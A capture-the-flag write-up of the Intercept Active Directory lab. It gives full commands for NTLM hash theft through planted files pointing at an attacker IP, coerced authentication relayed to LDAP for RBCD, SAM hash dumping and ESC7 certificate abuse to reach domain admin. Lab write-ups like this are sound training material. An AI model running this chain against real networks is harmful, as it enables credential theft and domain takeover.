Intercept, a hard rated chain machine involved two machines, WS01
and DC01
, on WS01 coercing NTLM authentication by uploading different file extensions to grab the hash of the user, performing Resource Based Constrained Delegation
(RBCD) by utilizing WebDAV
and PetitPotam
to relay WS01’s hash through LDAP, abusing GenericAll
to add user to ca-managers
and abusing ESC7
(Vulnerable Certificate Authority Access Control) to become domain admin.
NMAP
DC01.intercept.vl
PORT STATE SERVICE REASON VERSION
53/tcp open tcpwrapped syn-ack ttl 127
135/tcp open tcpwrapped syn-ack ttl 127
139/tcp open tcpwrapped syn-ack ttl 127
389/tcp open tcpwrapped syn-ack ttl 127
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.intercept.vl
445/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open tcpwrapped syn-ack ttl 127
49664/tcp open tcpwrapped syn-ack ttl 127
54368/tcp open tcpwrapped syn-ack ttl 127
55463/tcp open tcpwrapped syn-ack ttl 127
WS01.intercept.vl
PORT STATE SERVICE REASON VERSION
135/tcp open tcpwrapped syn-ack ttl 127
139/tcp open tcpwrapped syn-ack ttl 127
445/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open tcpwrapped syn-ack ttl 127
| ssl-cert: Subject: commonName=WS01.intercept.vl
| Issuer: commonName=WS01.intercept.vl
| Public Key type: rsa
| Public Key bits: 2048
Enumerating the smb shares, we have dev
and Users
share on WS01
We can access the dev share with null authentication which has readme stating about checking this share
From the tools
folder, it has Autologon64.exe
So this tells us that a user will constantly look into this folder, we can try coercing NTLM authentication, to do that we can try placing scf, url, lnk and other files that will have UNC path to our IP, we can utilize ntlm theft
script that can help us in generate files rather than spending time and doing it manually
python3 ./ntlm_theft.py -s 10.8.0.136 --generate all --filename @
With prompt off
and mput *
we can upload all of these files on dev smb share
As soon as these files will be uploaded, we’ll get NTLMv2 hash of Kathryn.Spencer
on Responder
We can try cracking it but before that let’s see if we can realy it on DC01 by checking if smb singing is disabled
SM signing is enabled so we can’t relay it and the only option we have here is to crack this hash, using hashcat
we'll be able to crack this hash with the password Chocolate1
hashcat -a 0 -m 5600 ./hash.txt /usr/share/wordlists/rockyou.txt
We can verify if we have a domain user
So now we can enumerate the domain with python-bloodhound
python3 /opt/BloodHound.py-Kerberos/bloodhound.py -d 'intercept.vl' -u 'KATHRYN.SPENCER' -p 'Chocolate1' -gc 'DC01.intercept.vl' -c all -ns 10.10.240.133
From bloodhound, we only see this user to be a part of intercept-users
group
We can try spraying the password on other domain users by retrieving the usernames from LDAP using windapsearch
windapsearch -u 'KATHRYN.SPENCER' -p 'Chocolate1' -d 'intercept.vl' -m users --dc 10.10.240.133 | grep sAMAccountName | awk -F: '{ print $2 }' | awk '{ gsub(/ /,""); print }'
But this password didn’t worked with any other user
Taking a hint from the vulnlab wiki, it mentions about looking into LDAP singing and WebClient service, we can check these if they are enabled with the help of crackmapexec
Performing RBCD to get Administrator (WS01)
WebClient (WebDAV) service is enabled on WS01, which can be abused to coerce authentication combined with PetitPotam
, we'll coerce WS01 to authenticate on DC01, since LDAP singing is disabled, this can be relayed with ntlmrealyx
through LDAP, we can add a machine account with delegation privileges to WS01 meaning that we can perform resource based delegation (RBCD)
on WS01 and impersonate as administrator
But the issue is to retrieve the coerced authentication, the host needs to be in an intranet zone, must be a domain joined machine or create a valid DNS entry, Starting responder
with HTTP set to off and note down the hostname it generates for us
Adding DNS entry for this hostname with dnstool.py
python3 dnstool.py -u 'intercept.vl\KATHRYN.SPENCER' -p Chocolate1 --action add --record WIN-6U9AIDU8LOC.intercept.vl --data 10.8.0.136 --type A 10.10.172.149
Running ntlmrealyx
with --delegate-access
on DC01
ntlmrelayx.py -t ldaps://10.10.172.149 --delegate-access -smb2support
And finally we are going to run petitpotam.py
on WS01
python3 petitpotam.py -d "intercept.vl" -u "KATHRYN.SPENCER" -p "Chocolate1" WIN-6U9AIDU8LOC@80/randomfile.txt 10.10.172.150
From the output of ntlmrelayx, we’ll see a machine account will be created with delegation rights to impersonate any users on WS01
We can verify this by checking the attributes of WS01 with rbcd.py
So now with getST.py
we can request a TGT for administrator user on WS01
getST.py -spn 'cifs/WS01.intercept.vl' -impersonate Administrator -dc-ip 10.10.172.149 'intercept/JELZDXBK$':'k)^g,*no2IwtvZY'
Dumping SAM hashes with secretsdump.py
secretsdump.py administrator@WS01.intercept.vl -k -no-pass
From the output we’ll get another domain user’s credentials simon.bowen
, from bloodhound, this user has GenericAll
on ca-managers
group
certipy find -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' -vulnerable -stdout -dc-ip 10.10.172.149
Running certipy
to check what access rights the groups have on certificates
Vulnerable Certificate Authority Access Control (ESC7)
Here ca-managers group has ManageCa
permission which allows to change CA’s settings to enable Subject Alternative Name
(SAN) on all certificate templates which allows users to request a certificate for any domain user by enabling EDITF_ATTRIBUTESUBJECTALTNAME2
property which is dubbed as ESC7
We need to add Simon in ca-managers group, this can be done by first becoming the owner of the group and giving full control to Simon and then adding him into the group, for that we can use owneredit.py
anddacledit.py
and we need to use the old version of impacket so enabling python virtual environment
For using dacledit.py
git clone --branch dacledit https://github.com/ShutdownRepo/impacket.git
Also we can just copy owneredit.py
python3 ./owneredit.py -action write -target 'ca-managers' -new-owner 'Simon.Bowen' 'intercept.vl'/'Simon.Bowen':'b0OI_fHO859+Aw' -dc-ip 10.10.172.149
Now giving full control over ca-mangers object
dacledit.py -action 'write' -rights 'FullControl' -principal 'Simon.Bowen' -target 'ca-managers' 'intercept.vl'/'Simon.Bowen':'b0OI_fHO859+Aw' -dc-ip 10.10.172.149
Adding Simon into ca-managers group with net rpc
net rpc group addmem 'ca-managers' 'Simon.Bowen' -U intercept.vl/Simon.Bowen -S DC01.intercept.vl
To verify if Simon is in the ca-managers group, we can re run python bloodhound and see the data from there
Moving back to certipy, we’re going to make Simon a ca-office
which is basically granting manage certificates
rights to validate the failed request
certipy ca -ca 'INTERCEPT-DC01-CA' -add-officer 'Simon.Bowen' -u 'Simon.Bowen@intercept.vl' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.172.149
Now to list the certificate templates, to check if SubCA
is enabled
certipy ca -u "Simon.Bowen@intercept.vl" -p "b0OI_fHO859+Aw" -dc-ip "10.10.172.149" -ca 'INTERCEPT-DC01-CA' -list-templates
Requesting a certificate for administrator using SubCA template, it will be denied but still we’ll be able to save the private key
certipy req -u 'Simon.Bowen@intercept.vl' -p 'b0OI_fHO859+Aw' -ca INTERCEPT-DC01-CA -dc-ip 10.10.172.149 -template SubCA -upn administrator@intercept.vl
Having the manage certificates rights, we can validate the failed request since we have the key
certipy ca -ca 'INTERCEPT-DC01-CA' -issue-request 3 -u 'Simon.Bowen@intercept.vl' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.172.149
And then retrieving the administrator’s certificate
certipy req -ca 'INTERCEPT-DC01-CA' -retrieve 3 -u 'Simon.Bowen@intercept.vl' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.172.14
All that is left is to retrieve the NThash with the certificate
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'intercept.vl' -dc-ip 10.10.172.149
We can just login through WinRM on DC01
References
- https://github.com/Greenwolf/ntlm_theft
- https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/webclient
- https://www.hackingarticles.in/lateral-movement-webclient-workstation-takeover/
- https://github.com/dirkjanm/krbrelayx/blob/master/dnstool.py
- https://www.r-tec.net/r-tec-blog-resource-based-constrained-delegation.html
- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
- https://www.tarlogic.com/blog/ad-cs-esc7-attack/
- https://github.com/ShutdownRepo/impacket
- https://github.com/ShutdownRepo/impacket/blob/owneredit/examples/owneredit.py